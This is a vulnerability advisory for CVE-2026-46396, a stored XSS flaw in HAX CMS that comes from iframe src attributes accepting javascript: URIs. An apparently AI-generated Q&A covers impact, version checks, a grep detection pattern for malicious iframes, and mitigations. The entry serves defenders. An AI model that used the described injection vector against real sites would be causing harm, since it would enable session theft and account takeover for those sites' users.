CVE-2026-46396
Stored XSS in HAX CMS Prior to Version 26.0.0
Publication date: 2026-06-05
Last updated on: 2026-06-05
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| haxtheweb | haxcms | to 26.0.0 (exc) |
| haxtheweb | iframe_loader | to 26.0.0 (exc) |
| haxtheweb | video_player | to 26.0.0 (exc) |
| haxtheweb | haxcms_php | to 26.0.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-46396 is a stored cross-site scripting (XSS) vulnerability in HAX CMS that occurs due to improper sanitization of <iframe> elements. Specifically, the application allows javascript: URIs in the src attribute of iframes, which are executed when a malicious page is viewed.
This flaw enables attackers to inject and execute arbitrary JavaScript code in the context of a victim's browser.
How can this vulnerability impact me? :
Exploitation of this vulnerability allows attackers to run arbitrary scripts in a victim's browser, which can lead to access to sensitive client-side data such as authentication tokens, session cookies, application configurations, and user-specific API data.
- Full account takeover
- Session hijacking
- Unauthorized actions performed on behalf of the victim
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this stored cross-site scripting (XSS) vulnerability involves identifying if your HAX CMS installation is running a vulnerable version (prior to 26.0.0) and if it improperly sanitizes <iframe> elements allowing javascript: URIs in the src attribute.
You can check the version of HAX CMS installed by inspecting package versions for npm packages such as @haxtheweb/haxcms-nodejs, @haxtheweb/iframe-loader, @haxtheweb/video-player, or the haxcms-php version.
- For npm-based installations, run: npm list @haxtheweb/haxcms-nodejs @haxtheweb/iframe-loader @haxtheweb/video-player
- For PHP-based installations, check the version in the haxcms-php package files or documentation.
To detect exploitation attempts or presence of malicious javascript: URIs in iframe src attributes, you can scan your stored content or database for iframe tags containing 'javascript:' in the src attribute.
- Example command to search for suspicious iframe src attributes in stored files or database exports: grep -r '<iframe[^>]*src=["\']javascript:' /path/to/haxcms/content
- Monitor web traffic for suspicious payloads or injected scripts that include iframe elements with javascript: URIs.
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation step is to upgrade HAX CMS and all related packages to version 26.0.0 or later, where the vulnerability has been fixed.
Until the upgrade can be performed, you should sanitize or remove any iframe elements in stored content that use javascript: URIs in the src attribute to prevent execution of malicious scripts.
Additionally, review and restrict user input that can inject iframe elements, and implement Content Security Policy (CSP) headers to block execution of inline scripts or javascript: URIs.
Monitor logs and user activity for signs of exploitation such as unexpected script execution or account hijacking attempts.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The stored cross-site scripting (XSS) vulnerability in HAX CMS allows attackers to execute arbitrary JavaScript in a victim's browser, potentially accessing sensitive client-side data such as authentication tokens, session cookies, application configurations, and user-specific API data.
This unauthorized access and potential data exposure can lead to violations of data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and breaches.
Therefore, exploitation of this vulnerability could result in non-compliance with these standards due to compromised confidentiality and integrity of sensitive data.